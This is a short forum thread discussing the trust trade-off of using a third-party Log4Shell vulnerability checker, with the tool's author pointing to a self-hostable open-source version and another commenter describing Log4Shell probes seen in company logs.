I'm sure this is well-intentioned, but it seems also true that using this tool will give a third party, however benevolent, identification of your vulnerable website.
You're right, but this has always been the trade off with tools like this. You put some trust in the tool's authors and gain some insight in return. Remember the services that tested for Heartbleed (e.g. https://filippo.io/Heartbleed/)? Fairly similar trade-off, but still these tools were widely used.
Bad-intentioned people already have tools to do this.
My company's website has a couple dozen entries in its logs from people testing Log4Shell. We have no way of knowing if any of these are benevolent people trying to notify companies of the vulnerability, people hoping for a beg bounty, or actual attackers.
It's not hard to write a tool that scrapes Shodan.io and sends Log4Shell payloads to everything.
alexbakker|4 years ago
If you don't trust me and have some technical know-how, you can self host the service. It's open source: https://github.com/alexbakker/log4shell-tools.
Sohcahtoa82|4 years ago
My company's website has a couple dozen entries in its logs from people testing Log4Shell. We have no way of knowing if any of these are benevolent people trying to notify companies of the vulnerability, people hoping for a beg bounty, or actual attackers.
It's not hard to write a tool that scrapes Shodan.io and sends Log4Shell payloads to everything.